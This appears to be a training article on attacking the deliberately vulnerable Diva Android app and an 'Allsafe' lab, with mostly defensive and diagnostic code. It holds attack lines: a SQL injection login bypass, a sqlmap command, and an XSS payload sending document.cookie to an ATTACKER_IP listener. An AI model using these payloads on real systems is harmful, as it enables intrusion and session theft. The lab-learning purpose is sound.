Hacking Diva & Allsafe: A Deep Dive into Mobile and Web Penetration Testing + Video

Introduction:

In the ever-evolving landscape of cybersecurity, hands-on practice remains the cornerstone of skill development. A recent public walkthrough by Adam Ahmed, an Offensive Security Engineer, details the systematic compromise of two intentionally vulnerable applications: “Diva” (Android) and “Allsafe.” This article dissects the technical methodologies used in this engagement, providing a comprehensive guide for penetration testers looking to sharpen their skills in mobile application security and web exploitation.

Learning Objectives:

  • Understand the process of setting up an Android pentesting environment and decompiling APKs for static analysis.
  • Master the exploitation of common web vulnerabilities such as SQL Injection (SQLi) and Cross-Site Scripting (XSS) within the Allsafe challenge.
  • Learn to chain low-severity bugs to achieve a higher impact, simulating real-world adversarial tactics.

You Should Know:

1. Mobile Reconnaissance: Setting Up the Diva Lab

Before exploiting the Diva (Damn insecure and vulnerable App) application, we must prepare the battlefield. This involves setting up an Android Virtual Device (AVD) or a physical device in debugging mode and ensuring the necessary tools are installed on our attack machine (preferably Linux).

Step‑by‑step guide:

  1. Install ADB (Android Debug Bridge): On your Linux machine (e.g., Kali), install the Android tools.
    sudo apt update && sudo apt install adb -y
    
  2. Connect the Device: Connect your Android device/virtual machine via USB and enable USB debugging in Developer Options.
    adb devices
    

    Note: Ensure the device appears as “device” and not “unauthorized.”

  3. Install the Target App: Download the Diva APK and install it.
    adb install DivaApplication.apk
    
  4. Proxy Setup (Intercepting Traffic): To analyze the app’s network traffic, configure a Burp Suite proxy. On the Android device, set the Wi-Fi proxy to your host machine’s IP and port (e.g., 192.168.1.10:8080). Then, install the Burp CA certificate on the device to decrypt HTTPS traffic. This allows you to see the requests made by the app in real-time.
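Before installing the target app it helps to confirm that exactly one authorised device is attached, which is what the "device, not unauthorized" note above is about. The script below is an added example, not code from the original walkthrough: `parse_adb_devices()`, `ready_device()` and `STATE_HINTS` are my names, and `SAMPLE_OUTPUT` is constructed so the parser runs without a device.

```python
"""Check `adb devices -l` output for one usable target before installing Diva.

Added example for this walkthrough (not from the original post). SAMPLE_OUTPUT is
constructed; the __main__ path runs the real adb binary when it is on PATH.
"""
import shutil
import subprocess
from typing import Dict, Optional

# What each adb device state means for the lab setup described above.
STATE_HINTS = {
    "device": "ready",
    "unauthorized": "accept the 'Allow USB debugging' prompt on the device",
    "offline": "reconnect the cable or run `adb kill-server` and retry",
    "no permissions": "fix udev rules / run adb as a user that can open the USB device",
}

SAMPLE_OUTPUT = (  # constructed output of `adb devices -l`
    "List of devices attached\n"
    "emulator-5554          device product:sdk_gphone64_x86_64 transport_id:1\n"
    "ZY2244ABCD             unauthorized usb:1-1 transport_id:2\n"
)


def parse_adb_devices(output: str) -> Dict[str, str]:
    """Map serial -> state, skipping the header and blank lines."""
    devices: Dict[str, str] = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith("List of devices"):
            continue
        # "no permissions" is the only multi-word state adb prints
        state = "no permissions" if "no permissions" in line else parts[1]
        devices[parts[0]] = state
    return devices


def ready_device(output: str) -> Optional[str]:
    """Serial of the single authorised device, or None (with hints printed)."""
    devices = parse_adb_devices(output)
    for serial, state in devices.items():
        if state != "device":
            print(f"{serial}: {state} -> {STATE_HINTS.get(state, 'unknown state')}")
    ready = [s for s, st in devices.items() if st == "device"]
    return ready[0] if len(ready) == 1 else None


if __name__ == "__main__":
    if shutil.which("adb"):
        out = subprocess.run(["adb", "devices", "-l"], capture_output=True, text=True).stdout
    else:
        out = SAMPLE_OUTPUT
    print("target device:", ready_device(out))
```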

2. Static Analysis: Decompiling the APK

Static analysis involves inspecting the application’s source code without running it. This is crucial for finding hardcoded secrets or understanding logic flaws.

Step‑by‑step guide:

  1. Decompile with apktool: This extracts the app’s resources and AndroidManifest.xml.
    apktool d DivaApplication.apk
    
  2. Convert to Java with jadx or jadx-gui: For a more readable Java code view, use jadx. It generates Java source code from the APK.
    jadx-gui DivaApplication.apk
    
  3. Hunting for Secrets: In the `jadx-gui` output, search for keywords like “password”, “key”, “secret”, or “token”. In Diva, you will often find hardcoded credentials stored as plain strings in the source code. This mimics developers accidentally committing API keys to a public repository.
  4. Linux Command for String Extraction: You can also use basic Linux commands to quickly grep for strings. Because most entries inside an APK (a zip archive) are compressed, run the same grep recursively over the apktool or jadx output directory as well, to cover the code and resources that `strings` cannot see in the packed file. Note that `grep -E` is needed for the `|` alternation.
    strings DivaApplication.apk | grep -iE "password|api_key"
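The keyword hunt in steps 3 and 4 can be scripted over the jadx or apktool output directory. The scanner below is an added example, not code from the post, Diva, jadx or apktool; `SUSPECT`, `scan_for_secrets()` and `build_sample_tree()` are my names, and the sample files it writes are constructed.

```python
"""Hunt for hardcoded secrets in a decompiled APK tree (jadx/apktool output).
Added example for this walkthrough; not from the post, Diva, jadx or apktool.
build_sample_tree() writes constructed files to a temp dir so it runs offline."""
import os
import re
import tempfile
from typing import List, Tuple

# Identifier fragments that usually hold credentials (matched case-insensitively).
SUSPECT = r"(?:pass(?:word|wd)?|pwd|secret|api[_-]?key|token|private[_-]?key)"
PATTERNS = [
    # Java/Kotlin assignment:  String API_KEY = "...";   val token = "..."
    re.compile(r"\b\w*" + SUSPECT + r"\w*\s*=\s*\"([^\"]{4,})\"", re.IGNORECASE),
    # Android resources:  <string name="admin_password">...</string>
    re.compile(r"<string\s+name=\"[^\"]*" + SUSPECT + r"[^\"]*\"\s*>([^<]{4,})</string>", re.IGNORECASE),
]
SCAN_EXT = {".java", ".kt", ".xml", ".smali"}
Finding = Tuple[str, int, str]  # (path relative to root, line number, literal)


def scan_for_secrets(root: str) -> List[Finding]:
    """Walk `root` and return every suspicious literal, sorted by path and line."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1] not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for rx in PATTERNS:
                        m = rx.search(line)
                        if m:  # first matching rule wins for this line
                            findings.append((os.path.relpath(path, root), lineno, m.group(1)))
                            break
    return sorted(findings)


def build_sample_tree() -> str:
    """Write a constructed mini jadx-style tree and return its root directory."""
    root = tempfile.mkdtemp(prefix="diva-scan-")
    os.makedirs(os.path.join(root, "res", "values"))
    with open(os.path.join(root, "LoginActivity.java"), "w", encoding="utf-8") as fh:
        fh.write('public class LoginActivity {\n    private static final String API_KEY = '
                 '"sk_live_constructed123";\n    String greeting = "hello";\n}\n')
    with open(os.path.join(root, "res", "values", "strings.xml"), "w", encoding="utf-8") as fh:
        fh.write('<resources>\n<string name="app_name">Diva</string>\n'
                 '<string name="admin_password">hunter2!</string>\n</resources>\n')
    return root
```

Point `scan_for_secrets()` at the real jadx output directory; `build_sample_tree()` only exists so the scanner can be exercised offline.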
    

3. Dynamic Analysis: Exploiting Insecure Logging (Diva)

Diva often contains issues where sensitive information is printed to Android’s logging system (Logcat). An attacker with physical access or a malicious app with `READ_LOGS` permissions can steal this data.

Step‑by‑step guide:

  1. Launch the App: Open the Diva app on the device and navigate to the “Insecure Logging” section.
  2. Monitor Logcat: On your host machine, use ADB to monitor the device logs in real-time.
    adb logcat | grep -i "diva"
    
  3. Trigger the Function: Enter any text into the field (e.g., “test”) and click “Check”.
  4. Capture the Output: Review your terminal. You will likely see the entered text and potentially sensitive data printed by the developer for debugging. An attacker can view any data the developer left in these logs.
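The same leak can be caught on the defender's side by scanning logcat instead of reading it by eye. The detector below is an added example, not from the post or the Diva app; `LEAK_RULES`, `find_leaks()` and `SAMPLE_LINES` are my names, the log lines are constructed, and their `diva-log` tag is chosen to match the `grep -i "diva"` filter above.

```python
"""Flag logcat lines that leak sensitive data: the defender's view of Diva's "Insecure Logging".
Added example for this walkthrough, not from the post or the Diva app. SAMPLE_LINES are constructed
in `adb logcat -v threadtime` format; real output can be piped into this script on stdin."""
import re
import sys
from typing import Dict, List, Optional

# (rule name, regex tested against the message part of each line)
LEAK_RULES = [
    ("credential-in-log", re.compile(r"\b(?:password|passwd|pwd|pin|token|secret)\s*[:=]\s*\S+", re.I)),
    ("card-number", re.compile(r"\b(?:\d[ -]?){13,16}\b")),
    ("jwt", re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")),
]
# threadtime format: "MM-DD HH:MM:SS.mmm  PID  TID LEVEL TAG: message"
LOGCAT_LINE = re.compile(r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+\d+\s+\d+\s+"
                         r"(?P<level>[VDIWEF])\s+(?P<tag>[^:]+?)\s*:\s(?P<msg>.*)$")

SAMPLE_LINES = [  # constructed
    "03-14 10:22:01.120  4321  4321 E diva-log: Error while processing transaction with credit card: 4111 1111 1111 1111",
    "03-14 10:22:01.121  1234  1250 I ActivityManager: Displayed diva/.LogActivity: +312ms",
    "03-14 10:22:05.004  4321  4340 D diva-log: login attempt password=hunter2 user=alice",
    "03-14 10:22:06.000  4321  4340 V diva-log: button clicked",
]


def parse_logcat_line(line: str) -> Dict[str, str]:
    """Split one threadtime line into ts/level/tag/msg; {} if it is not a log line."""
    m = LOGCAT_LINE.match(line)
    return m.groupdict() if m else {}


def find_leaks(lines: List[str], tag_filter: Optional[str] = None) -> List[Dict[str, str]]:
    """One record per leaking line: tag, the rule that fired and the message."""
    hits = []
    for line in lines:
        rec = parse_logcat_line(line)
        if not rec or (tag_filter and tag_filter.lower() not in rec["tag"].lower()):
            continue
        for name, rx in LEAK_RULES:
            if rx.search(rec["msg"]):
                hits.append({"tag": rec["tag"], "rule": name, "msg": rec["msg"]})
                break  # first rule that fires is enough for triage
    return hits


if __name__ == "__main__":
    source = SAMPLE_LINES if sys.stdin.isatty() else sys.stdin.read().splitlines()
    for hit in find_leaks(source, tag_filter="diva"):
        print(f"[{hit['rule']}] {hit['tag']}: {hit['msg']}")
```

Run it as `adb logcat -v threadtime | python3 leakscan.py` on a real device; without stdin input it falls back to the constructed sample.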

4. Web Exploitation: SQL Injection on Allsafe

The Allsafe web application (fictional from Mr. Robot) typically contains classic web vulnerabilities. Let’s simulate a SQL injection attack to bypass authentication.

Step‑by‑step guide:

  1. Navigate to Login: Access the Allsafe login page via your browser.
  2. Manual Injection Test: In the username field, enter a classic SQLi payload to manipulate the query logic:
    admin' OR '1'='1' -- -
    

    Enter any password. The `-- -` comments out the rest of the original password check query.

  3. Using SQLMap: For automated exploitation, use SQLMap.
    sqlmap -u "http://target-ip/allsafe/login.php" --data="username=admin&password=test" --level=5 --risk=3 --dbs
    

    Note: Replace `target-ip` with the actual IP address. This command tests the POST parameters for injection and attempts to enumerate databases.
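To see exactly why the payload works and what the fix looks like, here is an added example that is not Allsafe's code: a login built by string concatenation beside its parameterised version, run against a constructed in-memory SQLite table. `make_db()`, `build_vulnerable_query()`, `vulnerable_login()` and `safe_login()` are assumed names.

```python
"""Why `admin' OR '1'='1' -- -` logs you in, and the parameterised query that stops it.
Added example for this walkthrough; this is not Allsafe's login code. An in-memory SQLite
table with one constructed user stands in for the site's database."""
import sqlite3

PAYLOAD = "admin' OR '1'='1' -- -"   # the username payload from the step above


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")  # constructed
    return con


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation: user input becomes part of the SQL text itself."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    # With PAYLOAD as username the WHERE clause becomes
    #   username = 'admin' OR '1'='1' -- -' AND password = '...'
    # and everything after `--` is a comment, so the password check vanishes.
    return con.execute(build_vulnerable_query(username, password)).fetchone() is not None


def safe_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the driver sends the quote characters as data, never as syntax.
    # (A real app also stores and compares password hashes, not plaintext.)
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    con = make_db()
    print(build_vulnerable_query(PAYLOAD, "wrong"))
    print("vulnerable:", vulnerable_login(con, PAYLOAD, "wrong"))  # True
    print("safe      :", safe_login(con, PAYLOAD, "wrong"))        # False
```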

5. Web Exploitation: Cross-Site Scripting (XSS) on Allsafe

XSS allows an attacker to inject malicious scripts into web pages viewed by other users.

Step‑by‑step guide:

  1. Find a Reflection Point: Look for a search bar or comment section within the Allsafe site.
  2. Inject a Test Payload: Enter a simple JavaScript alert to check for vulnerability.
    <script>alert('XSS')</script>
    
  3. Windows Command (Conceptual): While the attack happens in the browser, if we were to steal cookies, we would set up a listener on our attacking machine. On Windows, you might use `nc` (netcat) if installed via WSL or a tool like PowerCat. However, for a simple listener, we can use Python on Linux (WSL on Windows).
    # On your attacking machine (Linux/WSL)
    python3 -m http.server 80
    
  4. Craft the Payload: Instead of an alert, we send the cookies to our listener.
    <script>document.location='http://ATTACKER_IP/steal.php?cookie='+document.cookie</script>
    

    If the site is vulnerable, the victim’s browser will send their session cookies to your server.
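The same reflection, as an added example rather than Allsafe's code: a vulnerable search render beside its escaped form, a canary check a test suite can run before a pentester finds the bug, and the `Set-Cookie` flags that keep the session value out of `document.cookie`. `render_search_vulnerable()`, `render_search_safe()`, `reflects_unescaped()` and `session_cookie_header()` are assumed names.

```python
"""Reflected XSS: the vulnerable render next to the escaped one, a regression check, and the
cookie flags that blunt the cookie-theft payload above. Added example for this walkthrough;
render_search_* stand in for Allsafe's search page and are not its real code."""
import html
from typing import Callable

PAYLOAD = "<script>alert('XSS')</script>"   # the test payload from the step above


def render_search_vulnerable(query: str) -> str:
    # Raw interpolation: whatever the user typed is emitted as markup.
    return "<h2>Results for: " + query + "</h2>"


def render_search_safe(query: str) -> str:
    # html.escape(quote=True) turns < > & " ' into entities, so the input stays text.
    return "<h2>Results for: " + html.escape(query, quote=True) + "</h2>"


def reflects_unescaped(render: Callable[[str], str]) -> bool:
    """Regression check for a test suite: feed a harmless canary holding every HTML
    metacharacter and report True if it comes back verbatim (i.e. XSS-prone)."""
    canary = "c4n4ry<>\"'&"
    return canary in render(canary)


def session_cookie_header(value: str) -> str:
    """HttpOnly keeps the value out of document.cookie, Secure keeps it off plain HTTP,
    SameSite=Lax stops most cross-site sends; together they mean an injected script
    cannot simply read and forward the session cookie."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
    print("vulnerable reflects:", reflects_unescaped(render_search_vulnerable))  # True
    print("safe reflects      :", reflects_unescaped(render_search_safe))        # False
    print(session_cookie_header("constructed-session-id"))
```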

6. Hardening: Securing the Android Manifest

Based on the vulnerabilities found in Diva, we can apply hardening measures. A common issue is having the application debuggable in the release build.

Step‑by‑step guide:

  1. Check the Manifest: Look at the `AndroidManifest.xml` file extracted by apktool.
    <application android:allowBackup="true" android:debuggable="true" ... >
    

    The `android:debuggable="true"` flag is a critical security risk for production apps.

  2. Remediation: Developers must ensure this flag is set to `false` in the build configuration for any release version. This prevents an attacker from attaching a debugger to the process and inspecting memory or bypassing client-side checks.
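Checking the manifest can be automated over the apktool output. The audit below is an added example, not part of Diva or apktool; the manifest text is constructed to mirror the fragment in step 1 (the package name is made up), `audit_manifest()` and `harden_manifest()` are assumed names, and the rewrite only shows the target values, since the real fix belongs in the release build configuration as step 2 says.

```python
"""Audit an AndroidManifest.xml (as extracted by apktool) for the release-unsafe flags above.
Added example for this walkthrough; not part of Diva or apktool. VULNERABLE_MANIFEST is a
constructed manifest mirroring the fragment quoted in step 1 (package name is made up)."""
import xml.etree.ElementTree as ET
from typing import List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
VULNERABLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="example.diva">
  <application android:allowBackup="true" android:debuggable="true" android:label="Diva">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""


def _android(elem: ET.Element, name: str):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def audit_manifest(xml_text: str) -> List[str]:
    """Return one finding per unsafe flag; an empty list means the checked flags are fine."""
    app = ET.fromstring(xml_text).find("application")
    if app is None:
        return ["no <application> element found"]
    findings = []
    if _android(app, "debuggable") == "true":
        findings.append('android:debuggable="true": a debugger can attach to the release process')
    if _android(app, "allowBackup") != "false":   # absent means the default, which is true
        findings.append('android:allowBackup is not "false": app data can be pulled with adb backup')
    return findings


def harden_manifest(xml_text: str) -> str:
    """Rewrite both flags to their safe values (the target state; in a real project set
    them in the release build type, as the remediation step says)."""
    ET.register_namespace("android", ANDROID_NS)
    root = ET.fromstring(xml_text)
    app = root.find("application")
    if app is not None:
        app.set("{%s}debuggable" % ANDROID_NS, "false")
        app.set("{%s}allowBackup" % ANDROID_NS, "false")
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for finding in audit_manifest(VULNERABLE_MANIFEST):
        print("FINDING:", finding)
    print(harden_manifest(VULNERABLE_MANIFEST))
```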

What Undercode Says:

  • Key Takeaway 1: Practice in a Sandbox. The walkthrough of Diva and Allsafe highlights the importance of isolated, legal environments for honing offensive security skills. Tools like adb, jadx, and `sqlmap` are the standard arsenal for any mobile or web app pentester.
  • Key Takeaway 2: The Power of Chaining. Adam’s documentation demonstrates that security assessments are rarely about a single “magic bullet.” It is a process of enumeration, static analysis, and dynamic testing. The value lies in methodically documenting each failure and success, turning a simple CTF into a professional learning asset.
  • Key Takeaway 3: Mindset over Tools. While the commands are crucial, the underlying mindset of questioning application behavior—“Why is this logging?”, “Can I break this SQL query?”—is what separates a script kiddie from a security engineer. The eWPTX and eMAPT certifications listed in his profile validate this structured, professional approach to both web and mobile penetration testing.

Prediction:

As mobile device management (MDM) and containerization become more prevalent, the attack surface will shift. We predict a rise in “hybrid” attacks where a mobile app vulnerability (like insecure storage in Diva) is used to harvest credentials, which are then used to pivot to a web application (like Allsafe). Future penetration tests will increasingly focus on the interconnectivity between mobile front-ends and cloud/web back-ends, moving beyond isolated testing to full-stack compromise scenarios. Walkthroughs like this will serve as the foundational blueprint for those complex, cross-platform attack chains.

Reported By: Adam Ahmed – Hackers Feeds